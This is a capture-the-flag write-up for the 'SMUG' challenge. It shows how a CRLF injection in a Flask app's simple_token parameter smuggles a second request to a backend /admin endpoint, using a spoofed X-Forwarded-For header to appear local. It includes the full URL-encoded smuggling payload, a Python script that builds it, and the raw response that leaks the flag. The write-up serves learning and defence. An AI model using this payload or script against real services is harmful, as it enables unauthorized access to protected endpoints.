@xl00t
Created October 22, 2023 12:27
flag4all - SMUG

SMUG - 498 points

6 Solves

My app is faulty can you get the flag?? https://smug.flag4all.sh Flag format: flag{xxx}

Challenge source

app/app.py

# Excerpt from the challenge's app.py: curl_back(), DELETE and the hook that
# fills g.simple_token from the simple_token query parameter are defined
# elsewhere in the file and are not shown here.
@app.route('/delete', methods=['POST'])
def post_delete():
    post_idx = request.form.get('post_idx')
    print(post_idx)
    # post_idx is validated (decimal digits only) ...
    if not isinstance(post_idx, str) or not post_idx.isdecimal():
        abort(400)

    # ... but g.simple_token is forwarded to the backend untouched, so CR/LF
    # in the query parameter end up inside the backend request's header block.
    res = curl_back(f'/posts/{post_idx}', DELETE, request.remote_addr, g.simple_token)
    if res is None:
        abort(400)

    # The raw backend response is rendered as-is (no JSON parsing/beautifying).
    return render_template('/api_result.html', simple_token=g.simple_token, res=res)

Since /delete does not beautify the backend response (it renders the raw bytes it got back), we can use it to perform our HTTP request smuggling and still see the result. We create a token, then inject CRLFs into the simple_token query parameter so that a second request to the backend's /admin endpoint is smuggled behind the legitimate DELETE and its response is echoed back with the flag. The payload:

/delete?simple_token=b3a0608ca1966b6ed4d3409c90f98102194e232619bc4a935e0608959b7d0763%0D%0AContent-Length:%202%0d%0a%0d%0a2a%0d%0a%0d%0aGET%20/admin%20HTTP/1.1%0D%0AHost:%20127.0.0.1:8000%0D%0ASimple-Token:%20b3a0608ca1966b6ed4d3409c90f98102194e232619bc4a935e0608959b7d0763%0d%0aX-Forwarded-For:%20127.0.0.1%0d%0aContent-Length:%200%0d%0a%0d%0aGET%20/%20HTTP/1.1

Once curl_back() copies the simple_token value into the Simple-Token header of its backend request, the injected CRLFs terminate that header block. The Content-Length: 2 header makes the backend treat "2a" as the body of the first (DELETE) request, the bytes after it are parsed as a second, complete GET /admin request, and the trailing "GET / HTTP/1.1" line soaks up whatever headers curl_back appends after the token, turning them into a harmless third request. curl_back() also receives request.remote_addr, presumably forwarded as X-Forwarded-For, which is why the smuggled request sets X-Forwarded-For: 127.0.0.1 so that /admin sees a local client. Decoded, the smuggled value evaluates to these requests:

/delete?simple_token=b3a0608ca1966b6ed4d3409c90f98102194e232619bc4a935e0608959b7d0763
Content-Length: 2

2a

GET /admin HTTP/1.1
Host: 127.0.0.1:8000
Simple-Token: b3a0608ca1966b6ed4d3409c90f98102194e232619bc4a935e0608959b7d0763
X-Forwarded-For: 127.0.0.1
Content-Length: 0

GET / HTTP/1.1
...
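To make the mechanics concrete, here is an added example (not the author's or the challenge's code) that builds the smuggled simple_token value, URL-encodes it into the /delete query string, and then parses the byte stream a backend would receive into the individual requests it would see. The shape of curl_back() is an assumption (the real function is not on the page): it is modelled as a raw HTTP/1.1 request with Simple-Token and X-Forwarded-For headers. The token and client address are constructed sample values. A hardened token check, the kind of validation the vulnerable route is missing, is included alongside it.

```python
import re
from urllib.parse import quote

CRLF = "\r\n"

# Constructed sample token (any 64-char hex string); not the token from the writeup.
TOKEN = "0" * 64


def build_smuggled_token(token: str, target: str = "/admin",
                         backend_host: str = "127.0.0.1:8000") -> str:
    """Return a Simple-Token value that, once copied verbatim into a header line,
    closes the first request (with a 2-byte body) and appends a second one."""
    lines = [
        token,
        "Content-Length: 2",
        "",
        "2a",                          # exactly 2 bytes: the first request's body
        "",
        f"GET {target} HTTP/1.1",
        f"Host: {backend_host}",
        f"Simple-Token: {token}",
        "X-Forwarded-For: 127.0.0.1",  # make the smuggled request look local
        "Content-Length: 0",
        "",
        "GET / HTTP/1.1",              # absorbs the headers appended after ours
    ]
    return CRLF.join(lines)


def build_query(token_value: str) -> str:
    """URL-encode the value as the query string sent to the front-end /delete route."""
    return "/delete?simple_token=" + quote(token_value, safe="/:")


def assumed_curl_back_bytes(path: str, method: str, remote_addr: str,
                            simple_token: str) -> bytes:
    """ASSUMPTION: models the challenge's curl_back() (not shown on the page) as a
    raw HTTP/1.1 request that places the token and client address in headers."""
    return (
        f"{method} {path} HTTP/1.1{CRLF}"
        f"Host: 127.0.0.1:8000{CRLF}"
        f"Simple-Token: {simple_token}{CRLF}"
        f"X-Forwarded-For: {remote_addr}{CRLF}"
        f"{CRLF}"
    ).encode()


def split_requests(stream: bytes) -> list[dict]:
    """Minimal HTTP/1.1 request splitter: request-line, headers, then a body sized
    by Content-Length (0 if absent). Blank lines before a request-line are skipped,
    as RFC 9112 permits; an unterminated trailing head is reported as incomplete."""
    requests = []
    pos = 0
    while pos < len(stream):
        while stream.startswith(b"\r\n", pos):
            pos += 2
        if pos >= len(stream):
            break
        end = stream.find(b"\r\n\r\n", pos)
        if end == -1:
            requests.append({"incomplete": stream[pos:].decode(errors="replace")})
            break
        request_line, *header_lines = stream[pos:end].decode().split(CRLF)
        pos = end + 4
        method, target, _version = request_line.split(" ", 2)
        headers = {}
        for line in header_lines:
            name, _, value = line.partition(":")
            headers[name.strip().lower()] = value.strip()
        length = int(headers.get("content-length", "0"))
        body = stream[pos:pos + length].decode()
        pos += length
        requests.append({"method": method, "target": target,
                         "headers": headers, "body": body})
    return requests


_TOKEN_RE = re.compile(r"[0-9a-f]{64}")


def validate_token(token: str) -> str:
    """Hardened form (added here, not the challenge's fix): only a 64-char hex
    token may reach a header line, so CR/LF can never be injected."""
    if not _TOKEN_RE.fullmatch(token):
        raise ValueError("invalid simple_token")
    return token


def demo(remote_addr: str = "10.0.0.5") -> list[dict]:
    """Build the payload, feed it through the modelled curl_back(), and return the
    requests the backend would parse out of the resulting byte stream."""
    payload = build_smuggled_token(TOKEN)
    return split_requests(assumed_curl_back_bytes("/posts/0", "DELETE", remote_addr, payload))


if __name__ == "__main__":
    print(build_query(build_smuggled_token(TOKEN)))
    for r in demo():
        print(r["method"], r["target"], "body=", repr(r["body"]))
```

Under these assumptions the backend parses three requests: DELETE /posts/0 with body "2a", GET /admin carrying a valid Simple-Token and X-Forwarded-For: 127.0.0.1, and a trailing GET / that has no Simple-Token header at all, which matches the 200 followed by a 401 seen in the writeup's raw response. With validate_token() applied before the header is built, the same payload is rejected with a 400 instead of reaching the backend.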

Sending the payload to the challenge returns the raw backend response, with the smuggled /admin response (and the flag) pipelined right after the first one:

POST /delete?simple_token=b3a0608ca1966b6ed4d3409c90f98102194e232619bc4a935e0608959b7d0763%0D%0AContent-Length:%202%0d%0a%0d%0a2a%0d%0a%0d%0aGET%20/admin%20HTTP/1.1%0D%0AHost:%20127.0.0.1:8000%0D%0ASimple-Token:%20b3a0608ca1966b6ed4d3409c90f98102194e232619bc4a935e0608959b7d0763%0d%0aX-Forwarded-For:%20127.0.0.1%0d%0aContent-Length:%200%0d%0a%0d%0aGET%20/%20HTTP/1.1 HTTP/1.1
Host: smug.flag4all.sh
sec-ch-ua: 
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: ""
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 10

post_idx=0



HTTP/1.1 200 
content-type: text/html; charset=utf-8
date: Sat, 21 Oct 2023 15:54:28 GMT
server: Werkzeug/3.0.0 Python/3.11.6
content-length: 943
alt-svc: h3=":443";ma=900;
set-cookie: C00ki3_st1cks=srv_8e3764354bd1f2bc478366221e074e9125382782e4de6fdc445883887a99a536; path=/
connection: close

<!DOCTYPE html>
<html>
<head>
  <link rel="stylesheet" type="text/css" href="/static/css/normalize.css">
</head>
<body>
  <h2>Result</h2>
  <pre>
nullHTTP/1.1 200 OK
date: Sat, 21 Oct 2023 15:54:27 GMT
server: uvicorn
content-length: 54
content-type: application/json

{&#34;message&#34;:&#34;flag{7847560c748814fd3070e9149a9578bd}\n&#34;}HTTP/1.1 401 Unauthorized
date: Sat, 21 Oct 2023 15:54:27 GMT
server: uvicorn
content-length: 4
content-type: application/json

null
  </pre><br>
  <a href="/menu?simple_token=b3a0608ca1966b6ed4d3409c90f98102194e232619bc4a935e0608959b7d0763%0D%0AContent-Length:+2%0D%0A%0D%0A2a%0D%0A%0D%0AGET+/admin+HTTP/1.1%0D%0AHost:+127.0.0.1:8000%0D%0ASimple-Token:+b3a0608ca1966b6ed4d3409c90f98102194e232619bc4a935e0608959b7d0763%0D%0AX-Forwarded-For:+127.0.0.1%0D%0AContent-Length:+0%0D%0A%0D%0AGET+/+HTTP/1.1"><button id="cancel" type="submit" form="cancel_button">Go back</button></a>
</body>
</html>